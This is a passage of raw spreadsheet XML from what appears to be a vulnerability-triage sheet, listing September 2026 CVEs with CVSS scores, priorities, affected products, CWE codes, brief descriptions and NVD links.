r="G258" s="5" t="inlineStr" /><c r="H258" s="5" t="n"><v>0.002</v></c><c r="I258" s="5" t="inlineStr" /><c r="J258" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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8" s="5" t="inlineStr" /><c r="M258" s="5" t="inlineStr" /><c r="N258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P258" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q258" s="5" t="inlineStr" /><c r="R258" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S258" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t></is></c></row><row r="259"><c r="A259" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C259" s="5" t="inlineStr"><is><t>CVE-2026-83998</t></is></c><c r="D259" s="5" t="n"><v>8.800000000000001</v></c><c r="E259" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G259" s="5" t="inlineStr" /><c r="H259" s="5" t="n"><v>0.004</v></c><c r="I259" s="5" t="inlineStr" /><c r="J259" s="5" t="inlineStr" /><c r="K259" s="5" t="inlineStr" /><c r="L259" s="5" t="inlineStr" /><c r="M259" s="5" t="inlineStr" /><c r="N259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P259" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q259" s="5" t="inlineStr" /><c r="R259" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S259" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t></is></c></row><row r="260"><c r="A260" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C260" s="5" t="inlineStr"><is><t>CVE-2026-85877</t></is></c><c r="D260" s="5" t="n"><v>8.800000000000001</v></c><c r="E260" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G260" s="5" t="inlineStr" /><c r="H260" s="5" t="n"><v>0.004</v></c><c r="I260" s="5" t="inlineStr" /><c r="J260" s="5" t="inlineStr" /><c r="K260" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2</t></is></c><c r="L260" s="5" t="inlineStr" /><c r="M260" s="5" t="inlineStr" /><c r="N260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P260" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q260" s="5" t="inlineStr" /><c r="R260" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S260" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t></is></c></row><row r="261"><c r="A261" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C261" s="5" t="inlineStr"><is><t>CVE-2026-86076</t></is></c><c r="D261" s="5" t="n"><v>8.800000000000001</v></c><c r="E261" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G261" s="5" t="inlineStr" /><c r="H261" s="5" t="n"><v>0.004</v></c><c r="I261" s="5" t="inlineStr" /><c r="J261" s="5" t="inlineStr" /><c r="K261" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L261" s="5" t="inlineStr" /><c r="M261" s="5" t="inlineStr" /><c r="N261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P261" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q261" s="5" t="inlineStr" /><c r="R261" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S261" s="5" t="inlineStr"><is><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is></c><c r="T261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t></is></c></row><row r="262"><c r="A262" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C262" s="5" t="inlineStr"><is><t>CVE-2026-86083</t></is></c><c r="D262" s="5" t="n"><v>8.800000000000001</v></c><c r="E262" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G262" s="5" t="inlineStr" /><c r="H262" s="5" t="n"><v>0.004</v></c><c r="I262" s="5" t="inlineStr" /><c r="J262" s="5" t="inlineStr" /><c r="K262" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L262" s="5" t="inlineStr" /><c r="M262" s="5" t="inlineStr" /><c r="N262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P262" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q262" s="5" t="inlineStr" /><c r="R262" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S262" s="5" t="inlineStr"><is><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is></c><c r="T262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t></is></c></row><row r="263"><c r="A263" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C263" s="5" t="inlineStr"><is><t>CVE-2026-86730</t></is></c><c r="D263" s="5" t="n"><v>8.800000000000001</v></c><c r="E263" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G263" s="5" t="inlineStr" /><c r="H263" s="5" t="n"><v>0.004</v></c><c r="I263" s="5" t="inlineStr" /><c r="J263" s="5" t="inlineStr" /><c r="K263" s="5" t="inlineStr" /><c r="L263" s="5" t="inlineStr" /><c r="M263" s="5" t="inlineStr" /><c r="N263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q263" s="5" t="inlineStr" /><c r="R263" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S263" s="5" t="inlineStr"><is><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is></c><c r="T263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t></is></c></row><row r="264"><c r="A264" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C264" s="5" t="inlineStr"><is><t>CVE-2026-12611</t></is></c><c r="D264" s="5" t="n"><v>8.699999999999999</v></c><c r="E264" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F264" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G264" s="5" t="inlineStr" /><c r="H264" s="5" t="n"><v>0.003</v></c><c r="I264" s="5" t="inlineStr" /><c r="J264" s="5" t="inlineStr" /><c r="K264" s="5" t="inlineStr" /><c r="L264" s="5" t="inlineStr" /><c r="M264" s="5" t="inlineStr" /><c r="N264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P264" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q264" s="5" t="inlineStr" /><c r="R264" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S264" s="5" t="inlineStr"><is><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is></c><c r="T264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t></is></c></row><row r="265"><c r="A265" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C265" s="5" t="inlineStr"><is><t>CVE-2026-33197</t></is></c><c r="D265" s="5" t="n"><v>8.699999999999999</v></c><c r="E265" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F265" s="5" t="inlineStr"><is><t>biossecurity@ami.com</t></is></c><c r="G265" s="5" t="inlineStr" /><c r="H265" s="5" t="n"><v>0.001</v></c><c r="I265" s="5" t="inlineStr" /><c r="J265" s="5" t="inlineStr" /><c r="K265" s="5" t="inlineStr" /><c r="L265" s="5" t="inlineStr" /><c r="M265" s="5" t="inlineStr" /><c r="N265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q265" s="5" t="inlineStr" /><c r="R265" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S265" s="5" t="inlineStr"><is><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is></c><c r="T265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t></is></c></row><row r="266"><c r="A266" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C266" s="5" t="inlineStr"><is><t>CVE-2026-55250</t></is></c><c r="D266" s="5" t="n"><v>8.699999999999999</v></c><c r="E266" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F266" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G266" s="5" t="inlineStr" /><c r="H266" s="5" t="n"><v>0.006</v></c><c r="I266" s="5" t="inlineStr" /><c r="J266" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K266" s="5" t="inlineStr" /><c r="L266" s="5" t="inlineStr" /><c r="M266" s="5" t="inlineStr" /><c r="N266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P266" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q266" s="5" t="inlineStr" /><c r="R266" s="5" t="inlineStr"><is><t>CWE-294, CWE-613, CWE-672</t></is></c><c r="S266" s="5" t="inlineStr"><is><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is></c><c r="T266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t></is></c></row><row r="267"><c r="A267" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C267" s="5" t="inlineStr"><is><t>CVE-2026-62648</t></is></c><c r="D267" s="5" t="n"><v>8.699999999999999</v></c><c r="E267" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F267" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G267" s="5" t="inlineStr" /><c r="H267" s="5" t="n"><v>0.003</v></c><c r="I267" s="5" t="inlineStr" /><c r="J267" s="5" t="inlineStr" /><c r="K267" s="5" t="inlineStr" /><c r="L267" s="5" t="inlineStr" /><c r="M267" s="5" t="inlineStr" /><c r="N267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q267" s="5" t="inlineStr" /><c r="R267" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S267" s="5" t="inlineStr"><is><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is></c><c r="T267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t></is></c></row><row r="268"><c r="A268" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C268" s="5" t="inlineStr"><is><t>CVE-2026-62649</t></is></c><c r="D268" s="5" t="n"><v>8.699999999999999</v></c><c r="E268" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F268" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G268" s="5" t="inlineStr" /><c r="H268" s="5" t="n"><v>0.003</v></c><c r="I268" s="5" t="inlineStr" /><c r="J268" s="5" t="inlineStr" /><c r="K268" s="5" t="inlineStr" /><c r="L268" s="5" t="inlineStr" /><c r="M268" s="5" t="inlineStr" /><c r="N268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P268" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q268" s="5" t="inlineStr" /><c r="R268" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S268" s="5" t="inlineStr"><is><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is></c><c r="T268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t></is></c></row><row r="269"><c r="A269" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C269" s="5" t="inlineStr"><is><t>CVE-2026-62650</t></is></c><c r="D269" s="5" t="n"><v>8.699999999999999</v></c><c r="E269" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F269" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G269" s="5" t="inlineStr" /><c r="H269" s="5" t="n"><v>0.003</v></c><c r="I269" s="5" t="inlineStr" /><c r="J269" s="5" t="inlineStr" /><c r="K269" s="5" t="inlineStr" /><c r="L269" s="5" t="inlineStr" /><c r="M269" s="5" t="inlineStr" /><c r="N269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q269" s="5" t="inlineStr" /><c r="R269" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S269" s="5" t="inlineStr"><is><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is></c><c r="T269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t></is></c></row><row r="270"><c r="A270" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C270" s="5" t="inlineStr"><is><t>CVE-2026-73314</t></is></c><c r="D270" s="5" t="n"><v>8.699999999999999</v></c><c r="E270" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F270" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G270" s="5" t="inlineStr" /><c r="H270" s="5" t="n"><v>0.005</v></c><c r="I270" s="5" t="inlineStr" /><c r="J270" s="5" t="inlineStr" /><c r="K270" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L270" s="5" t="inlineStr" /><c r="M270" s="5" t="inlineStr" /><c r="N270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P270" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q270" s="5" t="inlineStr" /><c r="R270" s="5" t="inlineStr"><is><t>CWE-754</t></is></c><c r="S270" s="5" t="inlineStr"><is><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is></c><c r="T270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t></is></c></row><row r="271"><c r="A271" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C271" s="5" t="inlineStr"><is><t>CVE-2026-73316</t></is></c><c r="D271" s="5" t="n"><v>8.699999999999999</v></c><c r="E271" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F271" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G271" s="5" t="inlineStr" /><c r="H271" s="5" t="n"><v>0.002</v></c><c r="I271" s="5" t="inlineStr" /><c r="J271" s="5" t="inlineStr" /><c r="K271" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L271" s="5" t="inlineStr" /><c r="M271" s="5" t="inlineStr" /><c r="N271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P271" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q271" s="5" t="inlineStr" /><c r="R271" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="S271" s="5" t="inlineStr"><is><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is></c><c r="T271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t></is></c></row><row r="272"><c r="A272" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C272" s="5" t="inlineStr"><is><t>CVE-2026-77111</t></is></c><c r="D272" s="5" t="n"><v>8.699999999999999</v></c><c r="E272" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F272" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G272" s="5" t="inlineStr" /><c r="H272" s="5" t="n"><v>0.005</v></c><c r="I272" s="5" t="inlineStr" /><c r="J272" s="5" t="inlineStr" /><c r="K272" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L272" s="5" t="inlineStr" /><c r="M272" s="5" t="inlineStr" /><c r="N272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P272" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q272" s="5" t="inlineStr" /><c r="R272" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S272" s="5" t="inlineStr"><is><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is></c><c r="T272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t></is></c></row><row r="273"><c r="A273" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C273" s="5" t="inlineStr"><is><t>CVE-2026-80219</t></is></c><c r="D273" s="5" t="n"><v>8.699999999999999</v></c><c r="E273" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G273" s="5" t="inlineStr" /><c r="H273" s="5" t="n"><v>0.002</v></c><c r="I273" s="5" t="inlineStr" /><c r="J273" s="5" t="inlineStr" /><c r="K273" s="5" t="inlineStr" /><c r="L273" s="5" t="inlineStr" /><c r="M273" s="5" t="inlineStr" /><c r="N273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P273" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q273" s="5" t="inlineStr" /><c r="R273" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S273" s="5" t="inlineStr"><is><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is></c><c r="T273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t></is></c></row><row r="274"><c r="A274" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C274" s="5" t="inlineStr"><is><t>CVE-2026-82064</t></is></c><c r="D274" s="5" t="n"><v>8.699999999999999</v></c><c r="E274" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F274" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G274" s="5" t="inlineStr" /><c r="H274" s="5" t="n"><v>0.003</v></c><c r="I274" s="5" t="inlineStr" /><c r="J274" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K274" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L274" s="5" t="inlineStr" /><c r="M274" s="5" t="inlineStr" /><c r="N274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P274" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q274" s="5" t="inlineStr" /><c r="R274" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S274" s="5" t="inlineStr"><is><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is></c><c r="T274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t></is></c></row><row r="275"><c r="A275" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C275" s="5" t="inlineStr"><is><t>CVE-2026-82075</t></is></c><c r="D275" s="5" t="n"><v>8.699999999999999</v></c><c r="E275" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F275" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G275" s="5" t="inlineStr" /><c r="H275" s="5" t="n"><v>0.003</v></c><c r="I275" s="5" t="inlineStr" /><c r="J275" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K275" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L275" s="5" t="inlineStr" /><c r="M275" s="5" t="inlineStr" /><c r="N275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P275" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q275" s="5" t="inlineStr" /><c r="R275" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S275" s="5" t="inlineStr"><is><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is></c><c r="T275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t></is></c></row><row r="276"><c r="A276" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C276" s="5" t="inlineStr"><is><t>CVE-2026-86727</t></is></c><c r="D276" s="5" t="n"><v>8.699999999999999</v></c><c r="E276" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F276" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G276" s="5" t="inlineStr" /><c r="H276" s="5" t="n"><v>0.003</v></c><c r="I276" s="5" t="inlineStr" /><c r="J276" s="5" t="inlineStr" /><c r="K276" s="5" t="inlineStr" /><c r="L276" s="5" t="inlineStr" /><c r="M276" s="5" t="inlineStr" /><c r="N276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P276" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q276" s="5" t="inlineStr" /><c r="R276" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S276" s="5" t="inlineStr"><is><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is></c><c r="T276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t></is></c></row><row r="277"><c r="A277" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C277" s="5" t="inlineStr"><is><t>CVE-2026-86732</t></is></c><c r="D277" s="5" t="n"><v>8.699999999999999</v></c><c r="E277" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F277" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G277" s="5" t="inlineStr" /><c r="H277" s="5" t="n"><v>0.005</v></c><c r="I277" s="5" t="inlineStr" /><c r="J277" s="5" t="inlineStr" /><c r="K277" s="5" t="inlineStr" /><c r="L277" s="5" t="inlineStr" /><c r="M277" s="5" t="inlineStr" /><c r="N277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P277" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q277" s="5" t="inlineStr" /><c r="R277" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S277" s="5" t="inlineStr"><is><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is></c><c r="T277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t></is></c></row><row r="278"><c r="A278" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C278" s="5" t="inlineStr"><is><t>CVE-2026-86738</t></is></c><c r="D278" s="5" t="n"><v>8.699999999999999</v></c><c r="E278" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G278" s="5" t="inlineStr" /><c r="H278" s="5" t="n"><v>0.003</v></c><c r="I278" s="5" t="inlineStr" /><c r="J278" s="5" t="inlineStr" /><c r="K278" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L278" s="5" t="inlineStr" /><c r="M278" s="5" t="inlineStr" /><c r="N278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P278" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q278" s="5" t="inlineStr" /><c r="R278" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S278" s="5" t="inlineStr"><is><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is></c><c r="T278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t></is></c></row><row r="279"><c r="A279" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C279" s="5" t="inlineStr"><is><t>CVE-2026-34223</t></is></c><c r="D279" s="5" t="n"><v>8.6</v></c><c r="E279" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F279" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G279" s="5" t="inlineStr" /><c r="H279" s="5" t="n"><v>0.001</v></c><c r="I279" s="5" t="inlineStr" /><c r="J279" s="5" t="inlineStr" /><c r="K279" s="5" t="inlineStr" /><c r="L279" s="5" t="inlineStr" /><c r="M279" s="5" t="inlineStr" /><c r="N279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P279" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q279" s="5" t="inlineStr" /><c r="R279" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S279" s="5" t="inlineStr"><is><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is></c><c r="T279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t></is></c></row><row r="280"><c r="A280" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C280" s="5" t="inlineStr"><is><t>CVE-2026-61517</t></is></c><c r="D280" s="5" t="n"><v>8.6</v></c><c r="E280" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F280" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G280" s="5" t="inlineStr" /><c r="H280" s="5" t="n"><v>0.016</v></c><c r="I280" s="5" t="inlineStr" /><c r="J280" s="5" t="inlineStr" /><c r="K280" s="5" t="inlineStr" /><c r="L280" s="5" t="inlineStr" /><c r="M280" s="5" t="inlineStr" /><c r="N280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P280" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q280" s="5" t="inlineStr" /><c r="R280" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S280" s="5" t="inlineStr"><is><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is></c><c r="T280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t></is></c></row><row r="281"><c r="A281" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C281" s="5" t="inlineStr"><is><t>CVE-2026-74239</t></is></c><c r="D281" s="5" t="n"><v>8.6</v></c><c r="E281" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F281" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G281" s="5" t="inlineStr" /><c r="H281" s="5" t="n"><v>0.007</v></c><c r="I281" s="5" t="inlineStr" /><c r="J281" s="5" t="inlineStr" /><c r="K281" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L281" s="5" t="inlineStr" /><c r="M281" s="5" t="inlineStr" /><c r="N281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P281" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q281" s="5" t="inlineStr" /><c r="R281" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S281" s="5" t="inlineStr"><is><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is></c><c r="T281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t></is></c></row><row r="282"><c r="A282" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C282" s="5" t="inlineStr"><is><t>CVE-2026-75990</t></is></c><c r="D282" s="5" t="n"><v>8.6</v></c><c r="E282" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F282" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G282" s="5" t="inlineStr" /><c r="H282" s="5" t="n"><v>0.002</v></c><c r="I282" s="5" 